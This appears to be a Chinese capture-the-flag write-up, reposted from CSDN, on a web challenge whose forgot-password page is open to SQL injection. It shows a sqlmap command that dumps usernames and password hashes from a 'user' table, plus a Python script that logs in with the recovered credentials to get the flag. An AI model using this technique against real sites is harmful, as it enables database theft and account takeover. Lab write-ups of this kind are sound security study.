2019-12-04

根據(jù)題目提示在登錄及注冊中有漏洞

首先進入登錄界面,尋求漏洞,BP抓包,發(fā)現(xiàn)為明文傳輸,第一個想到爆破,但是爆破結(jié)果不盡人意,沒有任何用出;接下來進行SQL注入嘗試,但是倆個界面均沒有POST注入漏洞,正要放棄時,發(fā)現(xiàn)在登錄界面還有一個忘記密碼界面,嘗試在該界面進行SQL注入,

python2 sqlmap.py -r post.txt --dump -C "username,password" -T "user" -D "cetc004"

放進sqlmap直接跑出user表內(nèi)的內(nèi)容,如下圖所示

其中admin為測試時注冊數(shù)據(jù),第一個username為自身信息,后password則為其密碼,但是該md5加密后的數(shù)據(jù)無法在尋常網(wǎng)站上解密,故,構造一個python的請求報文腳本,來獲取flag

import requests

url = 'http://111.198.29.45:54376/login.php'

username = 'c3tlwDmIn23'

password = '2f8667f381ff50ced6a3edc259260ba9'

payloads = { 'username':username, 'password':password }

r = requests.post(url, data = payloads)

print (r.text)

獲取到的flag如下圖所示

————————————————

版權聲明:本文為CSDN博主「記憶湛藍天空」的原創(chuàng)文章,遵循 CC 4.0 BY-SA 版權協(xié)議,轉(zhuǎn)載請附上原文出處鏈接及本聲明。

原文鏈接:https://blog.csdn.net/qq_41941506/article/details/90381051

?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內(nèi)容

  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,205評論 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當給sq...
    xuningbo閱讀 10,559評論 2 22
  • 重置3850交換機密碼 轉(zhuǎn)自:51CTO博客作者CaiJiantao的原創(chuàng)作品 https://blog.51ct...
    傲然怒放閱讀 130評論 0 0
  • # developer # ### 一、快速開始: 1,安裝部署 nacos 參考:https://nacos.i...
    gomcarter閱讀 498評論 0 0
  • 學習XML用法
    秦振江_師大閱讀 141評論 0 1

友情鏈接更多精彩內(nèi)容